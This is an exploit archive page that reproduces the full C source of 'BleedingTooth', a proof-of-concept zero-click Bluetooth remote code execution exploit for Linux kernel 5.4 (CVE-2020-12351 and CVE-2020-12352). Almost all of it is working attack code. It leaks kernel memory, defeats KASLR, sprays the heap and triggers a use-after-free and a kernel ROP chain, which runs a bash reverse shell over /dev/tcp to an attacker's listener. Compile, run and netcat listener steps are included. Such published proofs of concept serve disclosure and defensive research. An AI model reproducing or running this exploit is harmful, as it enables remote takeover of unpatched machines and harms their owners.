exploit the possibilities

Linux Kernel 5.4 BleedingTooth Remote Code Execution

Linux Kernel 5.4 BleedingTooth Remote Code Execution
Posted Apr 8, 2021
Authored by Andy Nguyen

Linux kernel version 5.4 BleedingTooth bluetooth zero-click proof of concept remote code execution exploit.

tags | exploit, remote, kernel, code execution, proof of concept
systems | linux
advisories | CVE-2020-12351, CVE-2020-12352
MD5 | 11e39065cefe8b6ef7461c14faa79210

Linux Kernel 5.4 BleedingTooth Remote Code Execution

Change Mirror Download
/*
* BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution
* by Andy Nguyen (theflow@)
*
* This Proof-Of-Concept demonstrates the exploitation of
* CVE-2020-12351 and CVE-2020-12352.
*
* Compile using:
* $ gcc -o exploit exploit.c -lbluetooth
*
* and execute as:
* $ sudo ./exploit target_mac source_ip source_port
*
* In another terminal, run:
* $ nc -lvp 1337
* exec bash -i 2>&0 1>&0
*
* If successful, a calc can be spawned with:
* export XAUTHORITY=/run/user/1000/gdm/Xauthority
* export DISPLAY=:0
* gnome-calculator
*
* This Proof-Of-Concept has been tested against a Dell XPS 15 running
* Ubuntu 20.04.1 LTS with:
* - 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020
* x86_64 x86_64 x86_64 GNU/Linux
*
* The success rate of the exploit is estimated at 80%.
*/

#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>
#include <bluetooth/l2cap.h>
#include <errno.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <unistd.h>

#define REMOTE_COMMAND "/bin/bash -c /bin/bash</dev/tcp/%s/%s"

// Increase if the heap spray is not reliable.
#define NUM_SPRAY_KMALLOC_1024 6
#define NUM_SPRAY_KMALLOC_128 6

// Increase if stuck at sending packets.
#define HCI_SEND_ACL_DATA_WAIT_USEC 5000

#define KERNEL_TEXT_BASE 0xffffffff81000000

#define KERNEL_UBUNTU_5_4_0_48 1

#ifdef KERNEL_UBUNTU_5_4_0_48
#define PUSH_RSI_ADD_BYTE_PTR_RBX_41_BL_POP_RSP_POP_RBP_RET 0xffffffff81567f46
#define POP_RAX_RET 0xffffffff8103d0b1
#define POP_RDI_RET 0xffffffff8108efa0
#define JMP_RAX 0xffffffff8100005b
#define RUN_CMD 0xffffffff810ce470
#define DO_TASK_DEAD 0xffffffff810dc260

#define KASLR_DEFEAT(kaslr_offset, kernel_addr) \
do { \
if ((kernel_addr & 0xfffff) == 0xf4d8e) \
kaslr_offset = kernel_addr - KERNEL_TEXT_BASE - 0xf4d8e; \
else \
kaslr_offset = kernel_addr - KERNEL_TEXT_BASE - 0xc001a4; \
} while (0)
#else
#error "No kernel version defined"
#endif

#define L2CAP_IDENT 0x41

#define SIGNALLING_CID 0x01
#define AMP_MGR_CID 0x03

typedef struct {
uint8_t code;
uint8_t ident;
uint16_t len;
} __attribute__((packed)) a2mp_hdr;
#define A2MP_HDR_SIZE 4

#define A2MP_COMMAND_REJ 0x01
typedef struct {
uint16_t reason;
} __attribute__((packed)) a2mp_command_rej;

#define A2MP_INFO_REQ 0x06
typedef struct {
uint8_t id;
} __attribute__((packed)) a2mp_info_req;

#define A2MP_INFO_RSP 0x07
typedef struct {
uint8_t id;
uint8_t status;
uint32_t total_bw;
uint32_t max_bw;
uint32_t min_latency;
uint16_t pal_caps;
uint16_t assoc_size;
} __attribute__((packed)) a2mp_info_rsp;

#define A2MP_ASSOC_REQ 0x08
typedef struct {
uint8_t id;
} __attribute__((packed)) a2mp_assoc_req;

#define A2MP_ASSOC_RSP 0x09
typedef struct {
uint8_t id;
uint8_t status;
uint8_t assoc_data[0];
} __attribute__((packed)) a2mp_assoc_rsp;

typedef struct {
uint8_t mode;
uint8_t txwin_size;
uint8_t max_transmit;
uint16_t retrans_timeout;
uint16_t monitor_timeout;
uint16_t max_pdu_size;
} __attribute__((packed)) l2cap_conf_rfc;

static char remote_command[64];

static int hci_sock = 0, l2_sock = 0;
static uint16_t hci_handle = 0;

static uint64_t kaslr_offset = 0, l2cap_chan_addr = 0;

static uint16_t crc16_tab[] = {
0x0000, 0xC0C1, 0xC181, 0x0140, 0xC301, 0x03C0, 0x0280, 0xC241, 0xC601,
0x06C0, 0x0780, 0xC741, 0x0500, 0xC5C1, 0xC481, 0x0440, 0xCC01, 0x0CC0,
0x0D80, 0xCD41, 0x0F00, 0xCFC1, 0xCE81, 0x0E40, 0x0A00, 0xCAC1, 0xCB81,
0x0B40, 0xC901, 0x09C0, 0x0880, 0xC841, 0xD801, 0x18C0, 0x1980, 0xD941,
0x1B00, 0xDBC1, 0xDA81, 0x1A40, 0x1E00, 0xDEC1, 0xDF81, 0x1F40, 0xDD01,
0x1DC0, 0x1C80, 0xDC41, 0x1400, 0xD4C1, 0xD581, 0x1540, 0xD701, 0x17C0,
0x1680, 0xD641, 0xD201, 0x12C0, 0x1380, 0xD341, 0x1100, 0xD1C1, 0xD081,
0x1040, 0xF001, 0x30C0, 0x3180, 0xF141, 0x3300, 0xF3C1, 0xF281, 0x3240,
0x3600, 0xF6C1, 0xF781, 0x3740, 0xF501, 0x35C0, 0x3480, 0xF441, 0x3C00,
0xFCC1, 0xFD81, 0x3D40, 0xFF01, 0x3FC0, 0x3E80, 0xFE41, 0xFA01, 0x3AC0,
0x3B80, 0xFB41, 0x3900, 0xF9C1, 0xF881, 0x3840, 0x2800, 0xE8C1, 0xE981,
0x2940, 0xEB01, 0x2BC0, 0x2A80, 0xEA41, 0xEE01, 0x2EC0, 0x2F80, 0xEF41,
0x2D00, 0xEDC1, 0xEC81, 0x2C40, 0xE401, 0x24C0, 0x2580, 0xE541, 0x2700,
0xE7C1, 0xE681, 0x2640, 0x2200, 0xE2C1, 0xE381, 0x2340, 0xE101, 0x21C0,
0x2080, 0xE041, 0xA001, 0x60C0, 0x6180, 0xA141, 0x6300, 0xA3C1, 0xA281,
0x6240, 0x6600, 0xA6C1, 0xA781, 0x6740, 0xA501, 0x65C0, 0x6480, 0xA441,
0x6C00, 0xACC1, 0xAD81, 0x6D40, 0xAF01, 0x6FC0, 0x6E80, 0xAE41, 0xAA01,
0x6AC0, 0x6B80, 0xAB41, 0x6900, 0xA9C1, 0xA881, 0x6840, 0x7800, 0xB8C1,
0xB981, 0x7940, 0xBB01, 0x7BC0, 0x7A80, 0xBA41, 0xBE01, 0x7EC0, 0x7F80,
0xBF41, 0x7D00, 0xBDC1, 0xBC81, 0x7C40, 0xB401, 0x74C0, 0x7580, 0xB541,
0x7700, 0xB7C1, 0xB681, 0x7640, 0x7200, 0xB2C1, 0xB381, 0x7340, 0xB101,
0x71C0, 0x7080, 0xB041, 0x5000, 0x90C1, 0x9181, 0x5140, 0x9301, 0x53C0,
0x5280, 0x9241, 0x9601, 0x56C0, 0x5780, 0x9741, 0x5500, 0x95C1, 0x9481,
0x5440, 0x9C01, 0x5CC0, 0x5D80, 0x9D41, 0x5F00, 0x9FC1, 0x9E81, 0x5E40,
0x5A00, 0x9AC1, 0x9B81, 0x5B40, 0x9901, 0x59C0, 0x5880, 0x9841, 0x8801,
0x48C0, 0x4980, 0x8941, 0x4B00, 0x8BC1, 0x8A81, 0x4A40, 0x4E00, 0x8EC1,
0x8F81, 0x4F40, 0x8D01, 0x4DC0, 0x4C80, 0x8C41, 0x4400, 0x84C1, 0x8581,
0x4540, 0x8701, 0x47C0, 0x4680, 0x8641, 0x8201, 0x42C0, 0x4380, 0x8341,
0x4100, 0x81C1, 0x8081, 0x4040,
};

static uint16_t crc16(uint16_t crc, const void *buf, size_t size) {
const uint8_t *p = buf;
while (size--)
crc = crc16_tab[(crc ^ (*p++)) & 0xff] ^ (crc >> 8);
return crc;
}

static int connect_l2cap(bdaddr_t dst_addr, uint16_t *handle) {
int l2_sock;

if ((l2_sock = socket(PF_BLUETOOTH, SOCK_RAW, BTPROTO_L2CAP)) < 0) {
perror("[-] socket");
exit(1);
}

struct sockaddr_l2 laddr = {0};
laddr.l2_family = AF_BLUETOOTH;
memcpy(&laddr.l2_bdaddr, BDADDR_ANY, sizeof(bdaddr_t));
if (bind(l2_sock, (struct sockaddr *)&laddr, sizeof(laddr)) < 0) {
perror("[-] bind");
exit(1);
}

struct sockaddr_l2 raddr = {0};
raddr.l2_family = AF_BLUETOOTH;
raddr.l2_bdaddr = dst_addr;
if (connect(l2_sock, (struct sockaddr *)&raddr, sizeof(raddr)) < 0 &&
errno != EALREADY) {
perror("[-] connect");
exit(1);
}

struct l2cap_conninfo conninfo = {0};
socklen_t len = sizeof(conninfo);
if (getsockopt(l2_sock, SOL_L2CAP, L2CAP_CONNINFO, &conninfo, &len) < 0) {
perror("[-] getsockopt");
exit(1);
}

if (handle)
*handle = conninfo.hci_handle;

return l2_sock;
}

static int connect_hci(void) {
struct hci_dev_info di = {0};
int hci_device_id = hci_get_route(NULL);
int hci_sock = hci_open_dev(hci_device_id);
if (hci_devinfo(hci_device_id, &di) < 0) {
perror("[-] hci_devinfo");
exit(1);
}

struct hci_filter flt = {0};
hci_filter_clear(&flt);
hci_filter_all_ptypes(&flt);
hci_filter_all_events(&flt);
if (setsockopt(hci_sock, SOL_HCI, HCI_FILTER, &flt, sizeof(flt)) < 0) {
perror("[-] setsockopt(HCI_FILTER)");
exit(1);
}

return hci_sock;
}

static void wait_event_complete_packet(void) {
while (1) {
uint8_t buf[256] = {0};
if (read(hci_sock, buf, sizeof(buf)) < 0) {
perror("[-] read");
exit(1);
}
if (buf[0] == HCI_EVENT_PKT) {
hci_event_hdr *hdr = (hci_event_hdr *)&buf[1];
if (btohs(hdr->evt) == EVT_NUM_COMP_PKTS)
break;
}
}
}

static void hci_send_acl_data(int hci_sock, uint16_t hci_handle, void *data,
uint16_t data_length, uint16_t flags) {
uint8_t type = HCI_ACLDATA_PKT;

hci_acl_hdr hdr = {0};
hdr.handle = htobs(acl_handle_pack(hci_handle, flags));
hdr.dlen = data_length;

struct iovec iv[3] = {0};
iv[0].iov_base = &type;
iv[0].iov_len = sizeof(type);
iv[1].iov_base = &hdr;
iv[1].iov_len = HCI_ACL_HDR_SIZE;
iv[2].iov_base = data;
iv[2].iov_len = data_length;
if (writev(hci_sock, iv, sizeof(iv) / sizeof(struct iovec)) < 0) {
perror("[-] writev");
exit(1);
}

usleep(HCI_SEND_ACL_DATA_WAIT_USEC);
wait_event_complete_packet();
}

static void disconnect_a2mp(void) {
printf("[*] Disconnecting A2MP channel...\n");

struct {
l2cap_hdr hdr;
l2cap_cmd_hdr cmd_hdr;
l2cap_disconn_req disconn_req;
} disconn_req = {0};
disconn_req.hdr.len = htobs(sizeof(disconn_req) - L2CAP_HDR_SIZE);
disconn_req.hdr.cid = htobs(SIGNALLING_CID);
disconn_req.cmd_hdr.code = L2CAP_DISCONN_REQ;
disconn_req.cmd_hdr.ident = L2CAP_IDENT;
disconn_req.cmd_hdr.len =
htobs(sizeof(disconn_req) - L2CAP_HDR_SIZE - L2CAP_CMD_HDR_SIZE);
disconn_req.disconn_req.dcid = htobs(AMP_MGR_CID);
disconn_req.disconn_req.scid = htobs(AMP_MGR_CID);
hci_send_acl_data(hci_sock, hci_handle, &disconn_req, sizeof(disconn_req), 2);
}

static void connect_a2mp(void) {
printf("[*] Connecting A2MP channel...\n");

struct {
l2cap_hdr hdr;
} a2mp_create = {0};
a2mp_create.hdr.len = htobs(sizeof(a2mp_create) - L2CAP_HDR_SIZE);
a2mp_create.hdr.cid = htobs(AMP_MGR_CID);
hci_send_acl_data(hci_sock, hci_handle, &a2mp_create, sizeof(a2mp_create), 2);

// Configure to L2CAP_MODE_BASIC and max MTU.
struct {
l2cap_hdr hdr;
l2cap_cmd_hdr cmd_hdr;
l2cap_conf_rsp conf_rsp;
l2cap_conf_opt conf_opt;
l2cap_conf_rfc conf_rfc;
l2cap_conf_opt conf_opt2;
uint16_t conf_mtu;
} conf_rsp = {0};
conf_rsp.hdr.len = htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE);
conf_rsp.hdr.cid = htobs(SIGNALLING_CID);
conf_rsp.cmd_hdr.code = L2CAP_CONF_RSP;
conf_rsp.cmd_hdr.ident = L2CAP_IDENT;
conf_rsp.cmd_hdr.len =
htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE - L2CAP_CMD_HDR_SIZE);
conf_rsp.conf_rsp.scid = htobs(AMP_MGR_CID);
conf_rsp.conf_rsp.flags = htobs(0);
conf_rsp.conf_rsp.result = htobs(L2CAP_CONF_UNACCEPT);
conf_rsp.conf_opt.type = L2CAP_CONF_RFC;
conf_rsp.conf_opt.len = sizeof(l2cap_conf_rfc);
conf_rsp.conf_rfc.mode = L2CAP_MODE_BASIC;
conf_rsp.conf_opt2.type = L2CAP_CONF_MTU;
conf_rsp.conf_opt2.len = sizeof(uint16_t);
conf_rsp.conf_mtu = htobs(0xffff);
hci_send_acl_data(hci_sock, hci_handle, &conf_rsp, sizeof(conf_rsp), 2);
}

static void prepare_l2cap_chan_addr_leak(void) {
printf("[*] Preparing to leak l2cap_chan address...\n");

struct {
l2cap_hdr hdr;
l2cap_cmd_hdr cmd_hdr;
l2cap_conf_rsp conf_rsp;
l2cap_conf_opt conf_opt;
l2cap_conf_rfc conf_rfc;
} conf_rsp = {0};
conf_rsp.hdr.len = htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE);
conf_rsp.hdr.cid = htobs(SIGNALLING_CID);
conf_rsp.cmd_hdr.code = L2CAP_CONF_RSP;
conf_rsp.cmd_hdr.ident = L2CAP_IDENT;
conf_rsp.cmd_hdr.len =
htobs(sizeof(conf_rsp) - L2CAP_HDR_SIZE - L2CAP_CMD_HDR_SIZE);
conf_rsp.conf_rsp.scid = htobs(AMP_MGR_CID);
conf_rsp.conf_rsp.flags = htobs(0);
conf_rsp.conf_rsp.result = htobs(L2CAP_CONF_UNACCEPT);
conf_rsp.conf_opt.type = L2CAP_CONF_RFC;
conf_rsp.conf_opt.len = sizeof(l2cap_conf_rfc);
conf_rsp.conf_rfc.mode = L2CAP_MODE_ERTM;
hci_send_acl_data(hci_sock, hci_handle, &conf_rsp, sizeof(conf_rsp), 2);
}

static uint64_t leak_kstack(void) {
printf("[*] Leaking A2MP kernel stack memory...\n");

struct {
l2cap_hdr hdr;
a2mp_hdr amp_hdr;
a2mp_info_req info_req;
} info_req = {0};
info_req.hdr.len = htobs(sizeof(info_req) - L2CAP_HDR_SIZE);
info_req.hdr.cid = htobs(AMP_MGR_CID);
info_req.amp_hdr.code = A2MP_INFO_REQ;
info_req.amp_hdr.ident = L2CAP_IDENT;
info_req.amp_hdr.len =
htobs(sizeof(info_req) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr));
// Use a dummy id to make hci_dev_get() fail.
info_req.info_req.id = 0x42;
hci_send_acl_data(hci_sock, hci_handle, &info_req, sizeof(info_req), 2);

while (1) {
uint8_t buf[256] = {0};
if (read(hci_sock, buf, sizeof(buf)) < 0) {
perror("[-] read");
exit(1);
}
if (buf[0] == HCI_ACLDATA_PKT) {
l2cap_hdr *l2_hdr = (l2cap_hdr *)&buf[5];
if (btohs(l2_hdr->cid) == AMP_MGR_CID) {
a2mp_hdr *amp_hdr = (a2mp_hdr *)&buf[9];
if (amp_hdr->code == A2MP_INFO_RSP)
return *(uint64_t *)&buf[21];
}
}
}

return 0;
}

static void trigger_type_confusion(void) {
struct {
l2cap_hdr hdr;
uint16_t ctrl;
a2mp_hdr amp_hdr;
a2mp_command_rej cmd_rej;
uint16_t fcs;
} cmd_rej = {0};
cmd_rej.hdr.len = htobs(sizeof(cmd_rej) - L2CAP_HDR_SIZE);
cmd_rej.hdr.cid = htobs(AMP_MGR_CID);
cmd_rej.ctrl = 0xffff;
cmd_rej.amp_hdr.code = A2MP_COMMAND_REJ;
cmd_rej.amp_hdr.ident = L2CAP_IDENT;
cmd_rej.amp_hdr.len = htobs(sizeof(cmd_rej) - L2CAP_HDR_SIZE -
sizeof(a2mp_hdr) - sizeof(uint32_t));
cmd_rej.cmd_rej.reason = 0;
cmd_rej.fcs = crc16(0, &cmd_rej, sizeof(cmd_rej) - sizeof(uint16_t));
hci_send_acl_data(hci_sock, hci_handle, &cmd_rej, sizeof(cmd_rej), 2);
}

static void build_krop(uint64_t *rop, uint64_t cmd_addr) {
*rop++ = kaslr_offset + POP_RAX_RET;
*rop++ = kaslr_offset + RUN_CMD;
*rop++ = kaslr_offset + POP_RDI_RET;
*rop++ = cmd_addr;
*rop++ = kaslr_offset + JMP_RAX;
*rop++ = kaslr_offset + POP_RAX_RET;
*rop++ = kaslr_offset + DO_TASK_DEAD;
*rop++ = kaslr_offset + JMP_RAX;
}

static void build_payload(uint8_t data[0x400]) {
// Fake sk_filter object starting at offset 0x300.
*(uint64_t *)&data[0x318] = l2cap_chan_addr + 0x320; // prog

// Fake bpf_prog object starting at offset 0x320.
// RBX points to the amp_mgr object.
*(uint64_t *)&data[0x350] =
kaslr_offset +
PUSH_RSI_ADD_BYTE_PTR_RBX_41_BL_POP_RSP_POP_RBP_RET; // bpf_func
*(uint64_t *)&data[0x358] = 0xDEADBEEF; // rbp

// Build kernel ROP chain that executes run_cmd() from kernel/reboot.c.
// Note that when executing the ROP chain, the data below in memory will be
// overwritten. Therefore, the argument should be located after the ROP chain.
build_krop((uint64_t *)&data[0x360], l2cap_chan_addr + 0x3c0);
strncpy(&data[0x3c0], remote_command, 0x40);
}

static void spray_kmalloc_1024(int num) {
// Skip first two hci devices because they may be legit.
for (int i = 2; i < num + 2; i++) {
printf("\r[*] Sending packet with id #%d...", i);
fflush(stdout);

struct {
l2cap_hdr hdr;
a2mp_hdr amp_hdr;
a2mp_info_rsp info_rsp;
} info_rsp = {0};
info_rsp.hdr.len = htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE);
info_rsp.hdr.cid = htobs(AMP_MGR_CID);
info_rsp.amp_hdr.code = A2MP_INFO_RSP;
info_rsp.amp_hdr.ident = L2CAP_IDENT;
info_rsp.amp_hdr.len =
htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr));
info_rsp.info_rsp.id = i;
hci_send_acl_data(hci_sock, hci_handle, &info_rsp, sizeof(info_rsp), 2);

struct {
l2cap_hdr hdr;
a2mp_hdr amp_hdr;
a2mp_assoc_rsp assoc_rsp;
uint8_t data[0x400];
} assoc_rsp = {0};
assoc_rsp.hdr.len = htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE);
assoc_rsp.hdr.cid = htobs(AMP_MGR_CID);
assoc_rsp.amp_hdr.code = A2MP_ASSOC_RSP;
assoc_rsp.amp_hdr.ident = L2CAP_IDENT;
assoc_rsp.amp_hdr.len =
htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr));
assoc_rsp.assoc_rsp.id = i;
for (int j = 0; j < sizeof(assoc_rsp.data); j += 8)
memset(&assoc_rsp.data[j], 'A' + j / 8, 8);
build_payload(assoc_rsp.data);

// Send fragmented l2cap packets (assume ACL MTU is at least 256 bytes).
hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp,
sizeof(assoc_rsp) - sizeof(assoc_rsp.data), 2);
hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x000], 0x100, 1);
hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x100], 0x100, 1);
hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x200], 0x100, 1);
hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp.data[0x300], 0x100, 1);
}

printf("\n");
}

static void spray_kmalloc_128(int num) {
// Skip first two hci devices because they may be legit.
for (int i = 2; i < num + 2; i++) {
printf("\r[*] Sending packet with id #%d...", i);
fflush(stdout);

struct {
l2cap_hdr hdr;
a2mp_hdr amp_hdr;
a2mp_info_rsp info_rsp;
} info_rsp = {0};
info_rsp.hdr.len = htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE);
info_rsp.hdr.cid = htobs(AMP_MGR_CID);
info_rsp.amp_hdr.code = A2MP_INFO_RSP;
info_rsp.amp_hdr.ident = L2CAP_IDENT;
info_rsp.amp_hdr.len =
htobs(sizeof(info_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr));
info_rsp.info_rsp.id = i;
hci_send_acl_data(hci_sock, hci_handle, &info_rsp, sizeof(info_rsp), 2);

struct {
l2cap_hdr hdr;
a2mp_hdr amp_hdr;
a2mp_assoc_rsp assoc_rsp;
uint8_t data[0x80];
} assoc_rsp = {0};
assoc_rsp.hdr.len = htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE);
assoc_rsp.hdr.cid = htobs(AMP_MGR_CID);
assoc_rsp.amp_hdr.code = A2MP_ASSOC_RSP;
assoc_rsp.amp_hdr.ident = L2CAP_IDENT;
assoc_rsp.amp_hdr.len =
htobs(sizeof(assoc_rsp) - L2CAP_HDR_SIZE - sizeof(a2mp_hdr));
assoc_rsp.assoc_rsp.id = i;
for (int j = 0; j < sizeof(assoc_rsp.data); j += 8)
memset(&assoc_rsp.data[j], 'A' + j / 8, 8);
// Fake sock object.
*(uint64_t *)&assoc_rsp.data[0x10] = l2cap_chan_addr + 0x300; // sk_filter
hci_send_acl_data(hci_sock, hci_handle, &assoc_rsp, sizeof(assoc_rsp), 2);
}

printf("\n");
}

int main(int argc, char *argv[]) {
if (argc != 4) {
printf("Usage: %s target_mac source_ip source_port\n", argv[0]);
exit(1);
}

bdaddr_t dst_addr = {0};
str2ba(argv[1], &dst_addr);

snprintf(remote_command, sizeof(remote_command), REMOTE_COMMAND, argv[2],
argv[3]);
printf("[+] Remote command: %s\n", remote_command);

printf("[*] Opening hci device...\n");
hci_sock = connect_hci();

printf("[*] Connecting to victim...\n");
l2_sock = connect_l2cap(dst_addr, &hci_handle);
printf("[+] HCI handle: %x\n", hci_handle);

connect_a2mp();

uint64_t kernel_addr = leak_kstack();
printf("[+] Kernel address: %lx\n", kernel_addr);
KASLR_DEFEAT(kaslr_offset, kernel_addr);
printf("[+] KASLR offset: %lx\n", kaslr_offset);
if ((kaslr_offset & 0xfffff) != 0) {
printf("[-] Error KASLR offset is invalid.\n");
exit(1);
}

prepare_l2cap_chan_addr_leak();
l2cap_chan_addr = leak_kstack() - 0x110;
printf("[+] l2cap_chan address: %lx\n", l2cap_chan_addr);
if ((l2cap_chan_addr & 0xff) != 0) {
printf("[-] Error l2cap_chan address is invalid.\n");
exit(1);
}

// Somehow, spraying a bit before makes the UaF more reliable.
printf("[*] Spraying kmalloc-1024...\n");
spray_kmalloc_1024(0x40);

// Disconnect to free the l2cap_chan object, then reconnect.
disconnect_a2mp();
connect_a2mp();

// Attempt to reclaim the freed l2cap_chan object.
printf("[*] Spraying kmalloc-1024...\n");
for (int i = 0; i < NUM_SPRAY_KMALLOC_1024; i++) {
spray_kmalloc_1024(0x40);
}

// Attempt to control the out-of-bounds read.
printf("[*] Spraying kmalloc-128...\n");
for (int i = 0; i < NUM_SPRAY_KMALLOC_128; i++) {
spray_kmalloc_128(0x40);
}

printf("[*] Triggering remote code execution...\n");
disconnect_a2mp();
trigger_type_confusion();

close(l2_sock);
hci_close_dev(hci_sock);

return 0;
}
Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    13 Files
  • 18
    Sep 18th
    2 Files
  • 19
    Sep 19th
    2 Files
  • 20
    Sep 20th
    14 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    28 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close